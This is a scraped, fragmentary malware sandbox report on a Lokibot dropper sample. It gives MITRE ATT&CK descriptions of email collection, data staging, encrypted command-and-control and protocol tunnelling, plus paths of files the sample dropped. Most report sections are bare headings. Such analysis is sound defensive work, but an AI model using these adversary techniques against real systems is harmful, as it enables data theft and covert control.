Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Authentication logs, Email gateway, File monitoring, Mail server, Office 365 trace logs, Process monitoring, Process use of network
Platforms:	Office 365, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: Lokibot

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Unpacked PEs

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Networking

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe.log

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_150mte30.zn5.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cdh4roqr.3j3.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hojog3ew.0sb.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kk3bso0d.u4o.ps1

C:\Users\user\AppData\Roaming\C79A3B\B52B3F.lck

C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3853321935-2125563209-4053062332-1002\eb42b1a5c308fc11edf1ddbdd25c8486_d06ed635-68f6-4e9a-955c-4899f5f57b9a

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Windows Analysis Report
SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre